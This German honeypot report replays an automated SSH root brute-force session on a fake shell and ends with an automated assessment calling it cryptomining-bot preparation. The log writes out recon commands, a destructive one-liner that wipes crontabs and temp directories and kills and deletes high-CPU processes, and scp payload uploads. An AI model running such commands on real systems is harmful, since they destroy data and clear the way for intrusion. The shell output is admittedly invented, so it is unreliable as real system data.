ALLSmartSecurity
Mitschnitt

SSH-Angriff aus Vereinigte Staaten: Schadcode nachladen und Einnisten per Cronjob

30.09.2026, 02:54 UTC · 942 Befehle · über ssh · Vereinigte Staaten

Überblick

Dienst
ssh (Port 22)
Herkunft
Vereinigte Staaten
Probierte Zugangsdaten
root / ******

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
root@srv01: ~

root@srv01:~$ uname -s -v -n -r -m
Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 web01
root@srv01:~$ uname -m | awk '{printf $1}'
x86_64
root@srv01:~$ uptime | grep -ohe 'up .*' | sed 's/,//g' | awk '{ print $2" "$3 }'
262 days, 04:12
root@srv01:~$ uname -s -v -n -r -m
Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 web01
root@srv01:~$ lspci | egrep VGA && lspci | grep 3D
bash: lspci: command not found
root@srv01:~$ lscpu | egrep "Model name:" | cut -d ' ' -f 14-
Intel(R) Xeon(R) CPU E5-2650 v3 @ 2.30GHz
root@srv01:~$ curl ipinfo.io/org
AS14618
root@srv01:~$ curl ipinfo.io/org
Cloudflare, Inc.
root@srv01:~$ nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | wc -l | head -c 1
bash: nvidia-smi: command not found
root@srv01:~$ nvidia-smi -q | grep "Product Name"
bash: nvidia-smi: command not found
root@srv01:~$ lspci | egrep VGA | grep Radeon | wc -l | head -c 1
0
root@srv01:~$ uname -n | awk '{printf $1}'
web01
root@srv01:~$ uname -r | awk '{printf $1}'
5.4.0-150-generic
root@srv01:~$ crontab -r ; rm -rf /var/tmp/.* /var/tmp/* /tmp/.* /tmp/* ; ps aux | awk '$3 > 40.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; done ; ps aux | awk '$4 > 60.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; d…
root@srv01:~$ echo 1234 > /tmp/d.log
root@srv01:~$ scp -qt "/var/tmp/HoitzADq"
root@srv01:~$ scp -qt "/tmp/HoitzADq"
root@srv01:~$ scp -qt "/dev/shm/HoitzADq"
root@srv01:~$ scp -qt "/dev/shm/HbVlnyni"
root@srv01:~$ uname -s -v -n -r -m
Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 web01
root@srv01:~$ crontab -r ; rm -rf /var/tmp/.* /var/tmp/* /tmp/.* /tmp/* ; ps aux | awk '$3 > 40.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; done ; ps aux | awk '$4 > 60.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; d…
bash: pidof: command not found
root@srv01:~$ echo 123456 > /tmp/d.log
root@srv01:~$ scp -qt "/var/tmp/vEjBpiuL"
root@srv01:~$ scp -qt "/tmp/vEjBpiuL"
root@srv01:~$ scp -qt "/dev/shm/vEjBpiuL"
root@srv01:~$ uname -s -v -n -r -m
Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 web01
root@srv01:~$ echo 12345678 > /tmp/d.log
root@srv01:~$ scp -qt "/var/tmp/peUbddIS"
root@srv01:~$ scp -qt "/tmp/peUbddIS"
root@srv01:~$ scp -qt "/dev/shm/peUbddIS"
root@srv01:~$ uname -s -v -n -r -m
Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 web01
root@srv01:~$ echo 123456789 > /tmp/d.log
root@srv01:~$ scp -qt "/var/tmp/oCUZvAwI"
root@srv01:~$ scp -qt "/tmp/oCUZvAwI"
root@srv01:~$ scp -qt "/dev/shm/oCUZvAwI"
root@srv01:~$ uname -s -v -n -r -m
Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 web01
root@srv01:~$ uname -s -v -n -r -m
Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 web01
root@srv01:~$ echo admin > /tmp/d.log
root@srv01:~$ scp -qt "/var/tmp/RqVbYtBF"

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Ein Angreifer meldete sich über SSH mit dem Benutzernamen root und einem erratenen Passwort an. Er führte zunächst eine Reihe von Systemabfragen durch, um die Hardware, die CPU und die Netzwerkinformation zu ermitteln. Anschließend löschte er temporäre Dateien und beendete Prozesse mit hoher CPU-Auslastung, bevor er versuchte, Dateien über SCP in verschiedene Verzeichnisse zu kopieren.

Was die Befehle bewirken

Die Befehle uname und lscpu identifizieren das Betriebssystem und den Prozessor, um die Rechenleistung einzuschätzen. Die Abfrage von ipinfo.io klärt, ob es sich um einen Cloud-Server handelt, was für die Skalierung von Angriffen relevant ist. Der Befehl crontab -r löscht geplante Aufgaben, während rm -rf temporäre Verzeichnisse leert, um Platz zu schaffen. Die awk-Schleife identifiziert Prozesse mit hoher CPU-Nutzung und beendet diese gewaltsam, um die volle Leistung für eigene Zwecke zu nutzen. Die scp-Befehle versuchen, Dateien in versteckte oder flüchtige Speicherorte wie /dev/shm zu schreiben, was oft der Persistenz dient.

Worauf es hinauslief

Das Vorgehen deutet stark auf die Vorbereitung für Kryptomining hin, da die GPU- und CPU-Informationen gezielt abgefragt wurden. Das Entfernen konkurrierender Prozesse und das Löschen von Temp-Dateien dient dazu, Ressourcen freizumachen und Spuren zu verwischen. Der Versuch, Dateien über SCP zu übertragen, ist typisch für das Einschleusen von Mining-Software oder Botnet-Agenten.

Einordnung

Dieses Muster ist sehr verbreitet und folgt einem automatisierten Skript, das auf die Ausnutzung schwacher Root-Passwörter spezialisiert ist. Die Kombination aus Hardware-Scan und Prozessbereinigung ist ein Standardverfahren für automatisierte Mining-Bots.